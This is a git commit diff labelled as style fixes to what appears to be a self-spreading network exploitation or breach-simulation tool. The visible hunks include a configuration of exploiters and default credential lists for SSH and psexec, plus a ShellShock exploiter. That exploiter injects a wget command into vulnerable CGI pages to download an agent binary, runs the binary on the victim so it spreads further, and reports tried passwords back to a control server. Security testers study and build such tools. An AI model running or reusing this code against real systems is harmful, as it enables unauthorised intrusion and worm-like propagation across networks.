PEP 8 changes

This commit is contained in:
daniel goldberg 2016-08-29 13:48:00 +03:00
parent 1806f9bc62
commit cd27438a1e
3 changed files with 17 additions and 18 deletions

View File

@ -135,7 +135,7 @@ class Configuration(object):
scanner_class = TcpScanner scanner_class = TcpScanner
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger] finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
SSHExploiter, ShellShockExploiter #Linux SSHExploiter #Linux
] ]
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
@ -167,11 +167,11 @@ class Configuration(object):
########################### ###########################
# Auto detect and scan local subnets # Auto detect and scan local subnets
local_network_scan = True local_network_scan = False
range_class = FixedRange range_class = FixedRange
range_size = 1 range_size = 1
range_fixed = [''] range_fixed = ['10.0.1.160']
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,
@ -201,7 +201,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"] psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter # ssh exploiter
ssh_users = ["root"] ssh_users = ["root",'user']
ssh_passwords = ["Password1!", "1234", "password", "12345678"] ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter # rdp exploiter

View File

@ -16,7 +16,6 @@ __author__ = 'danielg'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
TIMEOUT = 2 TIMEOUT = 2
DOWNLOAD_TIMEOUT = 60
TEST_COMMAND = '/bin/uname -a' TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
LOG.info( LOG.info(
'Scanning %s, ports [%s] for vulnerable CGI pages' % ( 'Scanning %s, ports [%s] for vulnerable CGI pages' % (
host, ",".join([str(port[0]) for port in valid_ports])) host, ",".join([str(port[0]) for port in valid_ports]))
) )
attackable_urls = [] attackable_urls = []
@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc) LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
return False return False
src_path = src_path or get_target_monkey(host)
# copy the monkey # copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux dropper_target_path_linux = self._config.dropper_target_path_linux
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % host) LOG.info("Host %s was already infected under the current configuration, done" % host)
return True # return already infected return True # return already infected
src_path = src_path or get_target_monkey(host)
if not src_path: if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False return False
download_command = '/usr/bin/wget %s -O %s;' % ( download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux) http_path, dropper_target_path_linux)
download_and_run = exploit + download_command download = exploit + download_command
resp = self.attack_page(url, header, download_and_run) self.attack_page(url, header, download)
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue continue
@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(host, depth - 1) + ' & ' cmdline += build_monkey_commandline(host, depth - 1) + ' & '
run_path = exploit + cmdline run_path = exploit + cmdline
resp = self.attack_page(url, header, run_path) self.attack_page(url, header, run_path)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, host, cmdline) self._config.dropper_target_path_linux, host, cmdline)
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)): if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
LOG.info("Failed running the monkey, log file does not exist") LOG.info("Failed running the monkey, log file does not exist")
continue continue
@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter):
return urls return urls
@staticmethod @staticmethod
def report_vuln_shellshock(host,url): def report_vuln_shellshock(host, url):
from control import ControlClient from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__, ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
'exploiter': ShellShockExploiter.__name__, 'exploiter': ShellShockExploiter.__name__,

View File

@ -425,4 +425,5 @@ def report_failed_login(exploiter, machine, user, password):
from control import ControlClient from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__, ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__, 'exploiter': exploiter.__class__.__name__,
'user':user,'password':password}) 'user':user,'password':password})